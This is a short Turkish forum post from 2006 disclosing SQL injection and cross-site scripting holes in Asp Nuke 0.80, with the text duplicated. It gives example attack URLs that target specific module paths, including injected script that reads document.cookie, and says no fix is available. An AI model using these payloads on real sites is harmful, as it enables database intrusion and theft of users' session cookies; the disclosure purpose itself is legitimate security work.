SUSKUN
02-01-2006, 11:31 PM
Asp Nuke 0.80 versiyonunda Yüksek risk taşıyan SQL ve Cross site scripting açıkları mevcuttur.
SQL injection örnek kodlar:
[Only Registered Users Can See Links][target]/module/support/task/comments.asp?taskid='SQL_INJECTION
[Only Registered Users Can See Links][target]/module/support/task/detail.asp?taskid='SQL_INJECTION
[Only Registered Users Can See Links][target]/module/article/article/article.asp?articleid='SQL_INJECTION
XSS örnek kodlar:
[Only Registered Users Can See Links][target]/module/discuss/forum/profile.asp?to***id=1&thradid=346&username='%22%3E %3Cs cript%3Ealert(document.cookie)%3C/script%3E
[Only Registered Users Can See Links][target]/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
aynı şekilde çoğaltılabilir.
Çözüm:Şuan için bir çözüm bulunmamaktadır
SQL injection örnek kodlar:
[Only Registered Users Can See Links][target]/module/support/task/comments.asp?taskid='SQL_INJECTION
[Only Registered Users Can See Links][target]/module/support/task/detail.asp?taskid='SQL_INJECTION
[Only Registered Users Can See Links][target]/module/article/article/article.asp?articleid='SQL_INJECTION
XSS örnek kodlar:
[Only Registered Users Can See Links][target]/module/discuss/forum/profile.asp?to***id=1&thradid=346&username='%22%3E %3Cs cript%3Ealert(document.cookie)%3C/script%3E
[Only Registered Users Can See Links][target]/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
aynı şekilde çoğaltılabilir.
Çözüm:Şuan için bir çözüm bulunmamaktadır